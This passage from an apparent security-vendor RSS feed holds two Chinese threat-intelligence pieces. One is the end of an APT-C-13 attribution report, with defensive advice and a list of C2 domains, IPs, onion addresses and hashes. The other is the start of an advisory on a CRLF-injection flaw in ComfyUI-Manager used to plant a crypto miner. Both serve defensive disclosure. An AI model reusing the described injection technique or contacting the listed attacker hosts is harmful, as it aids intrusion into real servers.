style="text-align: left;" data-mid=""><p data-mpa-md-content="t" style="font-size: 18px;color: rgb(51, 51, 51);font-weight: bold;letter-spacing: 1px;text-align: left;" data-mid="" data-mpa-md-action-id="mmxaa02v10bp"><span leaf="">二、归属研判</span></p></div></div></div><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mmxaa02v1kte"><span leaf="">1 载荷投递与基础设施关联</span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02v1fg9"><span leaf="" style="">本次分析起始于一起利用盗版及虚假软件植入恶意载荷的网络间谍活动。遥测数据显示，核心恶意域名kalambur.net的使用，与历史记录中 APT-C-13组织发起的网络间谍行动存在资产关联。这种基础设施的复用与继承，为本次行动提供了坚实的初始溯源依据。</span></p><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mmxaa02vscc"><span leaf="">2 战略范式的演进：从破坏性震慑向情报导向潜伏的转型</span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02vp75"><span leaf="" style="">行业态势研判表明，自 2024 年以来，APT-C-13在针对目标国家的网络攻击行动策略经历了显著的范式转移：即从早期追求瞬时杀伤的破坏性打击，全面转向以长效情报收集为目标的持续性网络渗透。</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02w1oxf"><span leaf="" style="">这一转变在技术实现层面得到了深度印证：本次活动中观测到的轻量化、模块化恶意框架，及其高度依赖合规加密通信协议构建隐蔽通道的设计理念，精准契合了该组织“Living off the Land”的战略转型趋势，旨在最大程度降低行为熵值，实现高强度的防御规避。</span></p><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mmxaa02w1hbm"><span leaf="">3 对抗心理剖析</span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02w1dn3"><span leaf="" style="">进一步观察攻击者的资产特征，其采用的 “dontgive” 系列语义化命名规则，以及对核心脚本赋予斯拉夫语源词汇（如意指“混乱”的代号）的命名方式，深刻映射出APT-C-13在针对目标的行动中长期存在的心理战意图及行为特征。</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02w1eq8"><span leaf="" style="">基于其命名模式的词缀扩展规律研判，该组织在后续的武器库迭代中，极有可能继续沿用具备显著斯拉夫语系特征的词汇（如 Shlyambur、Bulyambur 等）作为标识符或攻击模块代号，以维持其战术资产的逻辑连贯性。</span></p><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mmxaa02wjo2"><span leaf="">4 归属结论</span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02w1og0"><span leaf="" style="">综合现有数字证据，该系列攻击活动以中等置信度归属于APT-C-13组织。</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02w1pqg"><span leaf="" style="">其核心战术表现为：利用持续迭代的模块化渗透框架，对特定目标实施以情报窃取为终极诉求的网络入侵。此模式标志着该组织的攻击逻辑已完成深度进化——从初期的“瞬时破坏性打击”演进为依托加密隧道及匿名网络构建的、具备长期驻留能力的“持续性寄生”。</span></p><div data-mpa-md-key="heading-1" style="margin-bottom: 16px;margin-top: 16px;"><div style="width: 100%;display: flex;justify-content: center;align-items: center;justify-content: flex-start;" data-mid=""><div style="text-align: left;" data-mid=""><p data-mpa-md-content="t" style="font-size: 18px;color: rgb(51, 51, 51);font-weight: bold;letter-spacing: 1px;text-align: left;" data-mid="" data-mpa-md-action-id="mmxaa02wbl6"><span leaf="">三、防范排查建议</span></p></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mn49duvg24ez" data-pm-slice="0 0 []"><div mpa-from-tpl="t"><div data-mpa-category="模板" style="width: 100%;padding: 0px 12px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;background: rgba(190, 116, 146, 0.08);padding: 14px;" data-mid="" mpa-from-tpl="t"><p style="width: 100%;font-size: 14px;color: #333333;line-height: 24px;" data-mid="" mpa-from-tpl="t"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p yb-mpa-mark="mark-intro" style="width: 100%;margin-top: 8px;" data-mid="" mpa-from-tpl="t"><span leaf="" mpa-is-content="t" mpa-font-style="mn49e1g11zvh" style="font-size: 16px;"><span textstyle="" style="font-weight: bold;">源头阻断非法工具</span>：严格管控办公环境中第三方激活工具及未经授权的精简版系统镜像，切断恶意载荷投送的主要渠道。</span></p></li><li><p yb-mpa-mark="mark-intro" style="width: 100%;margin-top: 8px;" data-mid="" mpa-from-tpl="t"><span leaf="" mpa-is-content="t" mpa-font-style="mn49e1g13gp" style="font-size: 16px;"><span textstyle="" style="font-weight: bold;">加强系统和网络监控</span>：实施全面的日志监控和分析，重点关注系统启动项、注册表修改以及PowerShell脚本的执行记录。</span></p></li><li><p yb-mpa-mark="mark-intro" style="width: 100%;margin-top: 8px;" data-mid="" mpa-from-tpl="t"><span leaf="" mpa-is-content="t" mpa-font-style="mn49e1g118v1" style="font-size: 16px;"><span textstyle="" style="font-weight: bold;">强化终端安全防护</span>：安装360安全卫士，并确保所有终端设备安装并定期更新反病毒和反恶意软件，进行全面的恶意软件扫描。</span></p></li></ul></p></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mmx5x6mr1s57"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-image: initial;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);" mpa-from-tpl="t"><p style="margin-top: -1.2em;text-align: center;border: none;line-height: 1.4;" mpa-from-tpl="t"><strong mpa-from-tpl="t"><span style="background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">附录 IOC</span></span></strong></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02w3yd"><span style="" mpa-font-style="mmx7tb5pcyp"><span style="font-weight: bold;" mpa-font-style="mmx9s5te1gaq"><span leaf="" mpa-font-style="mn31isohrq1" style="font-size: 15px;">C2</span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02w1rr9"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isoh1rv1">massgrave[.]link</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02wt8m"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isohkcq">dontgivefuck[.]com</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02x10a1"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isoh1oxp">dontgivedamn[.]com</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02x17uo"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isohc0k">kalambur[.]net</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02x1ssr"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isoh1vwq">sumbur[.]net</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02xh03"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isohrw4">57.128.59[.]134:24102</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02x1nu3"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isoh1esk">146.59.116[.]226:50845</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02xkwm"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isoh13tc">n6b6j4vlkc4ak343j4fmuwmosxtwrft6bph5s5562lefji4a475smuad.onion</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02xmeq"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isoh6l8">2zilmiystfbjib2k4hvhpnv2uhni4ax5ce4xlpb7swkjimfnszxbkaid.onion</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02x1meg"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isoh11do">i2rgcvog6cypjohfzfzw3d5kqgoobkzlbchsdxx4gm7lyaxn5nfp6bid.onion</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02x15mo"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isoh1o9r"><span textstyle="" style="font-weight: bold;">MD5</span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02xkjo"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isoh215h">b57299c00a0991036a96ab4bf5928134</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02x21ir"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isohpcc">deac8223ed9fc5e0a9adbc01abbe30cb</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02xybk"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isohpjt">620221e4c78e8df6f0ce4d489c15dffb</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02x143u"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isoh1j22">8295b1fac6535f4444a9d477c4225942</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02xpjy"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isoho3l">96a9321deca6717db13bd5db8d3abba5</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 8px;color: rgb(51, 51, 51);margin-top: 8px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02xzjk"><span leaf="" style="font-size: 15px;" mpa-font-style="mn31isohxpn">7eddf8cbe7e2bfb750cdd503eb912557</span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mmx5wbsk18s2"><div data-mpa-template="t" mpa-from-tpl="t"><div data-role="outer" label="Powered by 135editor.com" mpa-from-tpl="t"><div data-tools="135编辑器" data-id="96036" mpa-from-tpl="t"><div style="margin:10px auto;" mpa-from-tpl="t"><div data-autoskip="1" style="text-align: justify;letter-spacing: 1.5px;line-height: 1.75em;color: rgb(62, 62, 62);" mpa-from-tpl="t"><p hm_fix="208:559"><span style="color: #be191f;" data-mpa-action-id="mmx5wpp81cpj" data-pm-slice="0 0 []"><strong style="letter-spacing: 0.544px;caret-color: red;" mpa-from-tpl="t"><span style=""><span leaf="" mpa-font-style="mmx5wpokecm" style="font-size: 15px;">360</span></span></strong><strong style="letter-spacing: 0.544px;caret-color: red;" mpa-from-tpl="t"><span style=""><span leaf="" mpa-font-style="mmx5wpok1ror" style="font-size: 15px;">高级威胁研究院</span></span></strong></span></p><p hm_fix="208:559" style="line-height: 1.5em;"><span leaf="" mpa-font-style="mmyjhki3qyr" style="font-size: 14px;" data-mpa-action-id="mmyjhkijjjp" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(136, 136, 136);">360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=d4d6a4f0&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247508035%26idx%3D1%26sn%3D4d58712823b2121714adf4edbea69f60">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 24 Mar 2026 17:27:00 +0800</pubDate>
    </item>
    <item>
      <title>ComfyUI-Manager RCE（CVE-2026-22777）遭在野利用，数万台设备亟待修复</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247508019&amp;idx=1&amp;sn=d6d9df690f1943dae9e64a641b1c9a92</link>
      <description>ComfyUI中检出XMRig挖矿木马，深入排查及溯源后发现攻击者利用ComfyUI-Manager 注入漏洞（CVE-2026-22777）进行入侵，全球数万台设备受此高危漏洞影响⚠️</description>
      <content:encoded><![CDATA[<p><span>360威胁情报中心</span> <span>2026-03-19 15:34</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=64c29c59&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FEmmib7pWXrXLAddayoT0MCGDSeDqCUH7V6b3rCrNU1ZVWrCOoBeU9gzes66Og3Wadpa7AeCwt3HmqqEPEWXu37HWEGr6ic2lQibYCYnOjibk0vs%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>ComfyUI中检出XMRig挖矿木马，深入排查及溯源后发现攻击者利用ComfyUI-Manager 注入漏洞（CVE-2026-22777）进行入侵，全球数万台设备受此高危漏洞影响⚠️</p>
  <div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mmvvk4ioze7" data-pm-slice="0 0 []"><div style="display: flex;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;flex-direction: column;align-self: flex-start;" data-mid="" mpa-from-tpl="t"><div style="text-align: center;" data-mid="" mpa-from-tpl="t"><p yb-mpa-mark="mark-style-text" style="font-weight: bold;font-size: 18px;color: rgb(190, 25, 31);line-height: 18px;-webkit-box-reflect: below 1px linear-gradient(to top, rgba(0, 0, 0, 0.2), transparent);" data-mid="" mpa-from-tpl="t" mpa-is-content="t"><span leaf="">一、事件背景</span></p></div></div></div></div><p mpa-from-tpl="t" data-mpa-action-id="mmvvk4io11xb" data-pm-slice="0 0 []" style="text-indent: 2em;"><span leaf="">ComfyUI是一款基于节点式工作流的 Stable Diffusion图形界面工具，被广泛应用于AI绘画领域，而ComfyUI-Manager是ComfyUI 扩展管理器插件，用于管理自定义节点、模型和安装更新。</span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;font-size: 12pt;font-family: 宋体;font-weight: normal;line-height: 1.6em;margin-bottom: 16px;margin-top: 16px;"><span mpa-font-style="mmvulbti1k35" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-variant: normal;text-transform: none;"><span leaf="">近期，360安全大脑告警ComfyUI中检出XMRig挖矿木马，深入排查及溯源后发现攻击者利用ComfyUI-Manager 注入漏洞（CVE-2026-22777）进行入侵，并向ComfyUI execution.py、server.py中注入挖矿脚本</span></span><span style="font-variant: normal;text-transform: none;"><span leaf="">以实现隐匿挖矿</span></span><span style="font-variant: normal;text-transform: none;"><span leaf="">，结合360网络空间测绘数据，全球数万台设备受此高危漏洞影响。</span></span></span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;font-size: 12pt;font-family: 宋体;font-weight: normal;line-height: 1.6em;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-size: 17px;" mpa-font-style="mmvulbti13yb"><span leaf="">因攻击项目开发者为adolf hitler，且挖矿配置文件config.json包含信息&#34;user-agent&#34;: &#34;hitler-miner v14.88&#34;，故将该挖矿家族命名为“HitlerMiner”。</span></span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mmvvfsov5ss" data-pm-slice="0 0 []"><div style="display: flex;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;flex-direction: column;align-self: flex-start;" data-mid="" mpa-from-tpl="t"><div style="text-align: center;" data-mid="" mpa-from-tpl="t"><p yb-mpa-mark="mark-style-text" style="font-weight: bold;font-size: 18px;color: rgb(190, 25, 31);line-height: 18px;-webkit-box-reflect: below 1px linear-gradient(to top, rgba(0, 0, 0, 0.2), transparent);" data-mid="" mpa-from-tpl="t" mpa-is-content="t"><span leaf="">二、漏洞成因</span></p></div></div></div></div><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-size: 17px;" mpa-font-style="mmvulbti6ab"><span leaf="">ComfyUI-Manager 默认暴露了可通过Web API修改配置项的接口，且未对用户输入的\r\n等特殊字符进行过滤，导致存在CRLF注入漏洞。攻击者可通过换行符注入恶意配置项，将security_level降级为weak，从而允许执行高风险操作（如安装任意 git 仓库、pip 包等）实现远程代码执行，最终控制服务器。</span></span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mmvv7enlus6"><div style="width: 100%;padding: 14px;" mpa-from-tpl="t"><div style="width: 100%;" mpa-from-tpl="t"><div style="background: #333333;padding:0px 0px 0px 4px;" mpa-from-tpl="t"><p style="background: #F5F5F5;padding: 14px;font-size: 14px;color: #1C3237;line-height: 24px;" yb-mpa-mark="mark-style-text" mpa-from-tpl="t" data-mpa-action-id="mmvv7yul1m7u" data-pm-slice="0 0 []"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p mpa-from-tpl="t" mpa-is-content="t" style="margin-top: 0px;"><span mpa-font-style="mmvv7yu72e5" style="font-size: 16px;" data-mpa-action-id="mmvv82lx55d" data-pm-slice="0 0 []"><span style="font-weight: bold;"><span leaf="">漏洞危害等级</span></span><span leaf="">：</span></span><span leaf="" style="font-size: 16px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">高危</span></span><sup leaf="" mpa-font-style="mmvv82lf20j4" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf=""><span textstyle="" style="color: rgb(0, 128, 255);">[1]</span></span></sup></p></li><li><p mpa-from-tpl="t" mpa-is-content="t" style="margin-top: 8px;"><span leaf="" mpa-font-style="mmvv7yu7rir" style="font-size: 16px;"><span textstyle="" style="font-weight: bold;">用户交互要求</span>：</span><span style="font-size: 16px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf="">无需用户交互</span></span></p></li><li><p mpa-from-tpl="t" mpa-is-content="t" style="margin-top: 8px;"><span leaf="" mpa-font-style="mmvv7yu7g8z" style="font-size: 16px;"><span textstyle="" style="font-weight: bold;">影响版本</span>：</span><span style="font-size: 16px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf="">ComfyUI-Manager &lt; 3.39.2；4.0.3&lt;= ComfyUI-Manager &lt;4.0.5；</span></span></p></li><li><p mpa-from-tpl="t" mpa-is-content="t" style="margin-top: 8px;"><span leaf="" mpa-font-style="mmvv7yu777v" style="font-size: 16px;"><span textstyle="" style="font-weight: bold;">修复建议</span>：</span><span style="font-size: 16px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf="">尽快升级ComfyUI-Manager至3.39.2、4.0.5+安全版本。</span></span></p></li></ul></p></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mmvvg3p2fj2" data-pm-slice="0 0 []"><div style="display: flex;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;flex-direction: column;align-self: flex-start;" data-mid="" mpa-from-tpl="t"><div style="text-align: center;" data-mid="" mpa-from-tpl="t"><p yb-mpa-mark="mark-style-text" style="font-weight: bold;font-size: 18px;color: rgb(190, 25, 31);line-height: 18px;-webkit-box-reflect: below 1px linear-gradient(to top, rgba(0, 0, 0, 0.2), transparent);" data-mid="" mpa-from-tpl="t" mpa-is-content="t"><span leaf="">三、HitlerMiner版本迭代</span></p></div></div></div></div><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-size: 17px;" mpa-font-style="mmvulbtix4"><span leaf="">HitlerMiner挖矿木马项目更新频繁，从2025.12.10-2026.03.08不到3个月已进行了100余次提交，如下是其历史版本的部分commits记录： </span></span><o:page></o:page></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6167832167832168" data-s="300,640" data-type="png" data-w="1430" type="block" data-imgfileid="100024315" src="https://wechat2rss.xlab.app/img-proxy/?k=19b3c23c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIEk8ZXmFE6Z8a5hzf4q42uJZH7qCrribkF9xSYr5yGGNcxqmCiaDF3heydEhoaC1xjtic1oqqSicN3Hr8fricEBK3CsSJic2A7m80qE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-bottom: 16px;margin-top: 16px;"><span mpa-font-style="mmwwxwqt1af0" data-mpa-action-id="mmwwxwr9tes" data-pm-slice="0 0 []"><span leaf="" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-size: 17px;">2026-01-10版kalost-installer-fdf951c790a5源码截图如下：</span></span><o:page></o:page></p><p style="text-align: center;margin-bottom: 0px;" nodeleaf=""><img class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="100024316" data-ratio="0.8079331941544885" data-s="300,640" type="block" data-type="png" data-w="958" src="https://wechat2rss.xlab.app/img-proxy/?k=7799cbb8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJfWKBCx4Q5KXUObWXVibneicE80e09jg5EFFo8iccqOLueIFKM34v9fXpgH0PeiaVibUVcSxMF5Z46FDicgVibFhIaibkV5blNHicvYI28%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 0px;margin-bottom: 16px;line-height: 1.6em;margin-top: 16px;text-align: center;"><span style="font-family: 仿宋;font-variant: normal;text-transform: none;"><span leaf=""><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mmvvgkz41a90" data-pm-slice="0 0 []"><div style="display: flex;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;flex-direction: column;align-self: flex-start;" data-mid="" mpa-from-tpl="t"><div style="text-align: center;" data-mid="" mpa-from-tpl="t"><p yb-mpa-mark="mark-style-text" style="font-weight: bold;font-size: 18px;color: rgb(190, 25, 31);line-height: 18px;-webkit-box-reflect: below 1px linear-gradient(to top, rgba(0, 0, 0, 0.2), transparent);margin-top: 0px;" data-mid="" mpa-from-tpl="t" mpa-is-content="t"><span leaf="">四、攻击活动分析</span></p></div></div></div></div><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-bottom: 16px;line-height: 1.6em;margin-top: 16px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans 